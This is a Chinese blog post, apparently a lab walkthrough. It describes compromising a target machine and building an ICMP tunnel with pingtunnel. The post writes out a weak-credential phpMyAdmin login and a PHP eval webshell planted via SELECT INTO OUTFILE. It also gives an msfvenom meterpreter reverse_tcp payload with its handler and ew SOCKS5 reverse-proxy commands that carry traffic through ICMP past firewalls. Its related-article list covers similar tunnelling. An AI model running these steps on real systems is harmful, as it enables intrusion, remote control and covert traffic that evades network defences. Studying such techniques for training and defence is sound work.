icmp隧道搭建(pingtunnel的使用)

最新推荐文章于 2024-03-22 09:56:57 发布
最新推荐文章于 2024-03-22 09:56:57 发布
阅读量1.5k 收藏 8
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42345596/article/details/119115152
版权

icmp隧道搭建

在上个星期一个风和日丽得早上,上班刚打开电脑,师兄就发来了这样一条消息

image-20210721110118826

然后我就去测试了,访问页面如下,页面显示探针路径C:/phpStudy/WWW/l.php

image-20210721110640198

随手输了个root root检测,没想到真的是(靶场嘛,比较简单,大家勿喷哈~)

image-20210721110754511

image-20210721110809341

使用phpmyadmin连接MySQL,输入root:root

image-20210721111301712

查询数据库版本

select @@version;

image-20210721111602594

基础语法查询是否 secure_file_priv 没有限制

show global variables like '%secure_file_priv%';

NULL 不允许导入或导出,/tmp 只允许在 /tmp 目录导入导出,空 表示不限制目录

结果为空,直接写入一句话,这里因为我已经写入了,所以显示的已存在。

select '<?php @eval($_POST[zcc]);?>' into outfile 'C:/phpStudy/WWW/zcc1.php';

蚁剑连接

接下来就练习一下icmp隧道的搭建

工具一:pingtunnel 下载链接:https://github.com/esrrhs/pingtunnel/releases
准备一台kali传上pingtunnel,目标机也传上pingtunnel.exe,kali的ip:192.168.10.65 桥接

image-20210726101410062

image-20210721142732668

pingtunnel上线
vps机上执行以下命令, 开启服务器模式
./pingtunnel -type server

image-20210726105542324

客户端执行 以下命令,客户端本地监听8699端口 ,将监听到的连接通过icmpserver发送到Linsten_ip:38975,通过TCP隧道
注意,在客户端中运行一定要加noprint nolog两个参数,否则会生成大量的日志文件
pingtunnel.exe -type client -l 127.0.0.1:38975 -s icmpserver_ip -t 192.168.10.65:38975 -tcp 1 -noprint 1 -nolog 1

此时服务端会有回显

image-20210726142918433

msf上线
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=38975 -f exe > /tmp/zccccz.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.65
set lport 38975
exploit

image-20210726144312921

image-20210726144359393

组合ew建立socks5隧道
ew下载链接:https://github.com/idlefire/ew
这里在kali vps端运行如下命令
./ew_for_linux64 -s rcsocks -l 10080 -e 8898
./pingtunnel -type server

客户端执行以下命令,ew回显ok,表示隧道打通。
开启ICMP隧道,采用sock5模式,将127.0.0.1:9999(pingtunnel客户端监听端口)所监听到的请求通过192.168.10.65之间的ICMP隧道送至192.168.10.65:8898(ew服务端监听主机端口)
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.10.65 -t 192.168.10.65:8898 -sock5 -1 -noprint 1 -nolog 1

image-20210726170320821

这里因为靶机出了点问题就关了,打的师兄得虚拟机,所以回显得ip不太一样。
ew_for_Win.exe -s rssocks -d 127.0.0.1 -e 9999

连接代理,这里用的proxifier,可以远程访问表示隧道建立成功。

image-20210726163541780

66c9aac9323047b5f88b73e115cfb2d

image-20210726175840545

qyshskx
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Pingtunnel工具教程】利用ICMP隧道技术进行ICMP封装穿透防火墙
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
07-19 3340
在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。用户需要在受限制网络之外,预先启动该工具建立代理服务器。再以客户端模式运行该工具,就可以建立ICMP隧道。为了避免该隧道被滥用,用户还可以为隧道设置使用密码。内网渗透,渗透测试,内网隧道技术。......
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
huayimy的博客
01-02 1515
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
PingTunnel: 一款创新的网络代理工具
最新发布
gitblog_00040的博客
03-22 359
PingTunnel: 一款创新的网络代理工具 项目地址:https://gitcode.com/esrrhs/pingtunnel 项目简介 PingTunnel 是一个轻量级、开源的网络代理工具,由 esrrhs 开发并维护。它允许用户通过 ICMP(Internet Control Message Protocol)协议——也就是我们通常所说的"Ping"命令——来建立隧...
隐秘通信-使用PingTunnel搭建ICMP隧道实验
帮助别人等于帮助自己 ——MXi4oyu
08-09 474
Internet Control Message Protocol Internet控制报文协议,简称ICMP协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。CMP协议主要提供两种功能,一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。
PingTunnel(ptunnel)源码分析与性能改进
天笑的博客
08-20 813
这里写自定义目录标题PingTunnel(ptunnel)源码分析与性能改进主要问题问题1:ACK包响应太慢及发包太快导致传输受限解决方法问题2:发送方CPU 100%问题解决方案问题3:连接有时会挂掉解决方案未来的改进展望 PingTunnel(ptunnel)源码分析与性能改进 PingTunnel是用于内网穿透的工具,近期用到它,发现了不少问题,做了一些改进,记录于此。 这个工具大概是2004年左右由Daniel创建,之后维护到2011年左右,支持通过ICMP或DNS(UDP)通道做隧道传输TCP报文
ICMP隧道
javaEE_zero的博客
11-23 221
ICMP隧道的实现原理和防御方式
DNS与ICMP隧道资料
11-01
以前自己收集的一些DNS和ICMP隧道技术的文档, 非常有用, 包括源代码及文档资料, 欢迎下载
HC110110004 ICMP协议
01-05
Ping是使用ICMP Echo Request报文来查询某些信息,并通过ICMP Echo Reply报文来响应,进行差错检测。Tracert是使用ICMP Echo Request报文来跟踪数据包的传输路径,了解网络拓扑结构。 ICMP报文类型有很多种,每种...
ICMP-Tx:ICMP隧道
07-03
ICMP-Tx 创建具有自定义数据内容的 ICMP 数据包。 苹果电脑 你需要root权限才能启动start.py sudo ./start.py
icmp命令控制和隧道工具.zip
08-23
icmp命令控制和隧道工具;
ICMP.rar_ICMP通信实现_icmp
09-20
用于单片机实现网络通信.用C8051F完成. 已经验证过.
内网渗透之---PingTunnel怎么耍
Armandhe的博客
06-21 1465
内网渗透不得不说的秘密
群ping工具_流量转发加速工具Pingtunnel
weixin_39584571的博客
11-28 1406
Pingtunnelpingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具https://github.com/esrrhs/pingtunnel​github.com使用安装服务端首先准备好一个具有公网ip的服务器,如AWS上的EC2,假定域名或者公网ip是http://www.yourserver.com从releases下载对应的安装包,如pingtunnel...
内网渗透系列:内网隧道pingtunnel
闵行小鱼塘
04-10 1943
本文研究ICMP隧道的一个工具,pingtunnel
PingTunnel隧道搭建
weixin_45007073的博客
04-10 1780
概述 PingTunnel也是一款ICMP隧道建立工具,但是它和icmpsh不同的是,pingtunnel工具能够设置隧道密码,避免隧道被其他同行利用。此次实验我们使用一台VPS服务器(kali攻击机)去攻击一台Windows Server2008主机,然后我们利用被突破的一台linux边界服务器为跳板机,建立一条隧道,最后我们的攻击者使用win7来连接我们的VPS攻击机。 隧道搭建准备 首先我们在VPS攻击机上安装PingTunnel这款工具,因为我使用的是新版的Kali机,所以只需要解决一个依赖问题即可
Ping隧道
weixin_30535913的博客
06-29 426
1.研究原因: 校园内网的探索,校内电子图书馆资源的利用,认证校园网 2.目的: 内网服务器:在一台因防火墙等原因仅限icmp数据通过的 公网服务器 : 建立icmp 隧道链接,并在公网服务器上进行数据转发,实现内网服务器穿透防火墙 3.条件: 安装 Ptunnel 一台 服务器 4. 原理 在客户端借助icmp协议把想要发送的信息包装起来,到了...
【内网学习笔记】6、ICMP隧道工具使用
TeamsSix 的 CSDN 空间
04-07 724
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpsh、icmptunnel 等 ptunnel ptunnel 全称 PingTunnel,Kali
端口映射PortTunnel使用实例_博客起步
热门推荐
tsl11511170312的专栏
01-13 1万+
一、开张废话     正所谓:“好记性不如烂笔头”。越来越感觉到记录自己知识的重要性,所以决定还是写写博客。我并没有什么高深的技术,也没有专门为广大网友分享知识的闲心。只是没事记录下曾学习,用过的知识。    我并没有什么优美的文笔,这里如果没有你感兴趣的知识点,那么就可以直接pass,如果对知识点有兴趣,我很乐意接受大家指教,和大家讨论。 二、端口映射PortTunnel     1,我
3.内网渗透之reGeorg+Proxifier
weixin_30245867的博客
01-01 2067
本文旨在学习内网渗透代理工具reGeorg+Proxifier工具的使用和利用。 工具介绍: reGeorg是reDuh的继承者,利用了会话层的socks5协议,而Proxifier是一款强大的socks5客户端,可以让不支持通过代理服务器工作的网络能通过HTTPS或SOCKS代理或代理链。该文件下支持php,asp,jsp,aspx。 内网转发工具大体分为:端口转发工具(lcx.exe...
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值